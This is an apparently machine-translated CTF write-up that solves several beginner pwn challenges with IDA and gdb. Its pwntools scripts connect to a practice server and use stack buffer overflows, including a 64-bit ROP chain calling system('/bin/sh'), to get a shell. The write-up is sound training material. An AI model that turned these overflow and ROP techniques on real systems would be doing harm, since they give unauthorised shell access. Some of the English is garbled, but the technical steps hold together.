Tools involved are
Ubuntu 16.04
pwntools
EAST
gdb-peda
1、get_shell
Connection give flag, nc can be connected directly, and then enter ls to see the inside of the catalog, find the file named flag, cat flag to get flag
Below is a general solution
Look at the program for 64 digits of ELF
Then look at the protection mechanism
IDA then look to find the main function, F5 to see pseudo-code
shell system function can be obtained directly connected GET shell can be obtained
from pwn import * r=remote('111.198.29.45',51214) r.interactive()
2、CGfsb
3、when_did_you_born
Check the protection mechanism
Then drag the IDA
To enter v5 1926 but a cat flag to enter the 1926 to exit the program, gets function can overflow, we could time the name (v4) filled with meaningless characters input so that it overflows, the original value v5 overwrite, replaced by 1926
In the Double-IDA & 4 (var_20) and & 5 (var_18) found to differ 0x8 characters.
When the number is greater than the length of 0x8 v4 input characters, greater than 8 would overwrite v5, so that re-assignment v5
We can construct scripts
from pwn import * r=remote('111.198.29.45',51232) r.recvuntil("What's Your Birth?") r.sendline('2019') #随便填 r.recvuntil("What's Your Name?") payload='a'*0x8+p32(0x786) #0x786的十进制是1926 r.sendline(payload) r.interactive()
Execution, acquiring flag
. 4, hello_pwn
64-bit ELF
Open the NX protection
IDA throw a look, just let dword_601068 equal to 1,853,186,401 can perform sub_400686 function to get the flag
read there is an overflow, and unk_691968 dword_60106c offset and 4, it can easily override the value of dword_60106c
Scripting
from pwn import * #p=process('./hello_pwn') p=remote('111.198.29.45',31449) payload = 'a'*0x4+p64(1853186401) p.recvuntil("bof") p.sendline(payload) p.interactive()
carried out
5, level0
program is a 64-bit
NX protection
First look at pseudo-code
Return vulnerable_function function, read the function there is an overflow
Look at other functions, _system function can execute system commands
shift + F12 to see the string, found shell
Thinking is very clear, so read function overflows and then perform system functions, and let the system function parameters as / bin / sh, we can get to a shell
But this procedure is a 64-bit, 32-bit and different parameters can not be passed directly into the 64-bit program stored in the first register in the first parameter, the first six parameters are sequentially stored in the registers rdi, rsi, rdx, rcx , r8, r9, so we need to find the address of rdi
Then find the '/ bin / sh' address
And the system's address
Script as follows
from pwn import * r=remote('111.198.29.45',47491) rdi_add=0x400663 shell_add=0x400684 sys_add=0x400460 payload='a'*0x88+p64(rdi_add)+p64(shell_add)+p64(sys_add) r.sendline(payload) r.interactive()
--------------------------split line---------------------- --------------
Later I admit that I'm blind, not see callsystem shell functions can be called directly
Re-write the script
from pwn import * r=remote('111.198.29.45',47491) payload='a'*0x88+p64(0x400596) r.sendline(payload) r.interactive()
As the result, no longer demo